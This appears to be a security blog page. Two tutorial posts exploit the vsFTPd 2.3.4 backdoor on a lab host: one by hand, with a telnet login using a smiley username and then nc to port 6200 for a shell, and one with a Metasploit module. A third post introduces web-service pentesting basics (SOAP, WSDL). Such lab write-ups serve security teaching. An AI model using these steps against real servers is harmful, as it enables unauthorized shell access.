Manual vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

nmap -p0-65535 192.168.2.129

Featured image

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

In July 2011, it was discovered that vsftpd version 2.3.4 downloadable from the master site had been compromised. Users logging into a compromised vsftpd-2.3.4 server may issue a “: )” smileyface as the username and gain a command shell on port 6200. This was not an issue of a security hole in vsftpd, instead, someone[clarification needed] had uploaded a different version of vsftpd which contained a backdoor. Since then, the site was moved to Google App Engine.

Lets try to exploit without metasploit.

Try to connect the vsFTPd server using USER  name and PASS

Note :  User name should end with smiley “: ) ” 🙂

Whenever user connect to the vsFTPd server smiley it will opens the backdoor connection and enables the port 6200 in ftp server.

root@kali:~# telnet 192.168.2.129 21
 Trying 192.168.2.129...
 Connected to 192.168.2.129.
 Escape character is '^]'.
 220 (vsFTPd 2.3.4)
 USER invalid: )
 331 Please specify the password.
 PASS dont know
 ^]
 telnet> quit
 Connection closed.

Close the telnet session and connect it back to 6200 port using netcat or telnet.

nc 192.168.2.129 6200

or

telnet 192.168.2.129 6200

It will allows the user to connect the vsFTPd server without authentication.

Featured image

Done 🙂

vsFTPd Vulnerability Exploitation

vsftpd, (or very secure FTP daemon)  is an FTP server for Unix-like systems, including Linux, vsftpd is the default FTP server in the Ubuntu, CentOS, Fedora, NimbleX, Slackware and RHEL Linux distributions.

 Identify the vulnerrable host and perform scanning on the vulnerable machine using nmap or any other faviourate scanning tool

nmap -p0-65535 192.168.2.129

Featured image

Here the interesting part in this machine is port 21, if we enumerate ftp service using telnet port on 21 we might some information.

root@kali:~# telnet 192.168.2.129 21
Trying 192.168.2.129...
Connected to 192.168.2.129.
Escape character is '^]'.
220 (vsFTPd 2.3.4)

This machine has vsFTPD installed on it and vsftpd 2.3.4 version is vulnerable and allows to execute the command at backdoor.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

 Name Current Setting Required Description
 ----------------------------------------------------------------------------------
 RHOST                     yes                 The target address
 RPORT      21           yes                  The target port

Exploit target:

 Id Name
 --   ----
 0 Automatic

set the RHOT and RPORT to exploit 

Featured image

Got the shell 🙂

Getting start with Web Penetration testing

Featured image

Why web applications are major targets for attackers.

  • Web services are easy to penetrate as per the attacker’s point of view.
  • Web services are sensitive, attacker can get sensitive information.
  • Increasing of mobile application is attracts the attackers towards the web services.
  • Due to the lack of security implementations and resources available, web services play a vital role making it a possible attacking vector.

SOA Service Oriented Architecture

     Service oriented Architecture is a software design and software architecture design pattern based on discrete pieces of software that provide application functionality as services known as software oriented. A service is a self-contained logical representation of a repeatable function or activity. Services can be combined by other software applications that together provide the complete functionality of a large software application.

Service is well defined activity that does not depend on the state of other services.

Web service

A web service is a standardized way of establishing communication between two web-based application by using open standards over an internet protocol HTTP or HTTPS.

  • Web services are application components
  • Web services communicate using open protocols
  • Web services are self-contained and self-describing
  • Web services can be discovered using UDDI
  • Web services can be used by other applications
  • HTTP and XML is the basis for Web services

Advantages

  • Language Interoperability (Programming language independent)
  • Platform Independent (Hardware and OS independent)
  • Function Re usability
  • Firewall Friendly
  • Use of Standardized Protocols
  • Stateless Communication
  • Economic

Component of web services

  • Service Consumer
  • Service Provider
  • XML (Extensible Markup Language)
  • SOAP (Simple Object Access Protocol)
  • WSDL (Web Services Description Language)
  • UDDI (Universal Description, Discovery and Integration)

Simple Object Access Protocol (SOAP)

SOAP is a XML-based protocol that lets applications exchange information over HTTP, web serviced use SOAP format to send XML requests.

The actual data flows in the body block and the meta data is usually carried by the header block.

Web Services Description Language (WSDL)

Web Services Description Language is an XML-based language for describing Web services and how to access them”.

As per pen testing web services are concerned, understanding of WSDL file helps a lot in manual pen testing. We can divide WSDL file structure in to two parts according to our definition. 1st part describes what the web service and the 2ndparts tells how to access them

Elements

What it contains

definitions

All the XML elements are packed under definition element. It is also called as root or parent element of the WSDL file.

types

All the schema types or data types defined here.

message

This is a dependent element. Message is specified according to the data types defined in types element. And used in sideoperation element later.

portType

Element collects all the operations within a web service.

operation

Collection of input, output, fault and other message as specified in message element.

input message

It’s nothing but the parameters of the method used in SOAP request.

output message

It’s nothing but the parameters of the method used in SOAP response.

binding

This element connects part 2 of WSDL file with part1 associating itself to the portType element and allows to define the protocol you want to use.

soap:binding

It formulates the SOAP message at runtime.

service

Contains name of all the services provided by the service provider.

port

It provides the physical path or location of web server so that service consumer can connect with service provider.

Example WSDL file
<?xml version="1.0" encoding="UTF-8" ?> 
 <definitions xmlns="http://schemas.xmlsoap.org/wsdl/" xmlns:tns="http://example.in/itrservice/v_1_0" xmlns:mime="http://schemas.xmlsoap.org/wsdl/mime/" xmlns:http="http://schemas.xmlsoap.org/wsdl/http/" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:itrcmns="http://example.in/ws/ds/common/v_1_0" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" targetNamespace="http://example.in/itrservice/v_1_0">
 <types>
 <xs:schema xmlns:itrException="http://e.gov.in/ws/ds/ex/v_1_0" xmlns:authInfo="http://incometaxindiaefilinge.gov.in/ws/ds/common/v_1_0" targetNamespace="http://incometaxindiaefiling.gove.in/itrservice/v_1_0" elementFormDefault="qualified" attributeFormDefault="unqualified">
 <xs:import namespace="http://example.com/ws/ds/common/v_1_0" schemaLocation="https://incometaxindiaefiling.gov.in/e-FilingWS/xsd/DITWSCommon.xsd" /> 
 <xs:import namespace="http://example.com/ws/ds/ex/v_1_0" schemaLocation="https://incometaxindiaefiling.gov.in/e-FilingWS/xsd/DITWSITRException.xsd" /> 
 <xs:element name="ITRInvalidDocFaultException" type="itrException:ITRInvalidDocFaultException" /> 
 <xs:element name="ITRCredentialFaultException" type="itrException:ITRCredentialFaultException" /> 
 <xs:element name="ITRInvalidCertificateFaultException" type="itrException:ITRInvalidCertificateFaultException" /> 
 <xs:element name="ITRServiceFaultException" type="itrException:ITRServiceFaultException" /> 
 <xs:element name="ITRBusinessServiceFaultException" type="itrException:ITRBusinessServiceFaultException" /> 
 <xs:element name="ITRFaultException" type="itrException:ITRFaultException" /> 
 </xs:schema>



WSDL

  • WSDL stands for Web Services Description Language
  • WSDL is an XML-based language for describing Web services.
  • WSDL is a W3C recommendation

SOAP

  • SOAP stands for Simple Object Access Protocol
  • SOAP is an XML based protocol for accessing Web Services.
  • SOAP is based on XML
  • SOAP is a W3C recommendation

Reference:

http://www.w3schools.com/webservices/default.asp

http://en.wikipedia.org/wiki/Service-oriented_architecture

http://resources.infosecinstitute.com/